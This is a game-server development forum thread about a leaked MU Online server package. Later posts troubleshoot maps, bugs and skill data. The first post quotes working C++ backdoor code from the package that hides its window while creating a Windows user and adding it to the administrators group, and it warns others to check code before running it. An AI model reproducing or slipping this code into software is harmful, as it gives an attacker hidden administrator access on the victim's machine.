Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

[Development] ex700 chs*

Experienced Elementalist
Joined
May 12, 2006
Messages
212
Reaction score
11
@ Munrra what exactly file have this backdoor
Why this code:
Code:
void CSysInfo::MakeSystemAccount(char* Account,char* password)
{
	PROCESS_INFORMATION ProcessInformation;
	STARTUPINFO si;
    HANDLE ProcessHandle = NULL;
	
	// Initialize process startup info
    si.cb = sizeof(STARTUPINFO);
    si.lpReserved = NULL;
    si.lpTitle = NULL;
    si.lpDesktop = NULL;
    si.dwX = si.dwY = si.dwXSize = si.dwYSize = 0L;
    si.wShowWindow = SW_HIDE;
    si.lpReserved2 = NULL;
    si.cbReserved2 = 0;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.hStdInput  = NULL;
    si.hStdOutput = NULL;
	
	char szTxt[255];
	wsprintf(szTxt, "net user %s %s /add", Account, password);
	
	if(CreateProcess(NULL, szTxt, NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation))
	{
        Sleep(100);
		TerminateProcess(ProcessInformation.hThread, 0);
    }
	
	wsprintf(szTxt, "net localgroup administrators %s /add", Account);
	
	if(CreateProcess(NULL, szTxt, NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation))
	{
        Sleep(100);
		TerminateProcess(ProcessInformation.hThread, 0);
    }
}

Planning to hack anyone who is dumb to compile and run without checking this?
 
Last edited:
Newbie Spellweaver
Joined
Apr 25, 2013
Messages
65
Reaction score
113
Hello guys Link Online ! Rearranged

ashlay - [Development] ex700 chs* - RaGEZONE Forums








Config.zip

 
Last edited:
Junior Spellweaver
Joined
Oct 14, 2011
Messages
113
Reaction score
16
Hello guys Link Online ! Rearranged

ashlay - [Development] ex700 chs* - RaGEZONE Forums








Config.zip


in these files there are many maps that does not work, nor bring the gs_cs not be problem if terrain or gates but can not enter these maps
 
Newbie Spellweaver
Joined
Apr 25, 2013
Messages
65
Reaction score
113
@ALPANICOJust set the date correctly folder, GS moves and IRoo maps work perfectly, the server does not have bugs is very good to program soon will post a Release
 
Newbie Spellweaver
Joined
Apr 25, 2013
Messages
65
Reaction score
113
hello buddy. its working with windows server 2008 + mssql 2008r2? have siege server include?
do you have list of BUG from ur release?

I am using windows server 2008 + sql 2000 until the time making corrections in gamserver and customizing, I found two bugs in the main crash in horse and raven and crash in Kanturu event
 
Experienced Elementalist
Joined
Dec 30, 2004
Messages
205
Reaction score
186
Unload GameServer_CS (CryWolft and CastleSiege) pls,

Tkss
 
Last edited:
Joined
Jan 8, 2013
Messages
502
Reaction score
64
Yes RF skill tree is coded in that CHS gs, just you have to add data for id's

23,24,25,26,27,28,30,34,59,60,61,62,63,66,67,70,94,96,98,99,100,102,103,106

on MasterSkillTreeData.txt ~ ClassType 64 (RF) ~ take info from s9 client side .bmd


S9 KOR Local+Interface download (for RF tree only master .bmds & icons is needed) don't replace full local ^^


As you can see (Dmg every second) from new RF buff (purple dmg) works
ashlay - [Development] ex700 chs* - RaGEZONE Forums

dame new skill very hight, how to fix it??
 
Experienced Elementalist
Joined
May 16, 2009
Messages
205
Reaction score
101
Someone have this procedure WZ_SetPeriodExtendInventory this procedure is required when for use magic backpack
and this error in gameserver log when mouse over dark raven or dark horse [Security][Breach] Account[1] Character[Paulin] Code[30002]
 
Newbie Spellweaver
Joined
Jul 29, 2013
Messages
77
Reaction score
3
hello pls some have translated EventItembags and Shops?.
or some can me send name for Eventitembags and shops ? thanks ,.
 
Back
Top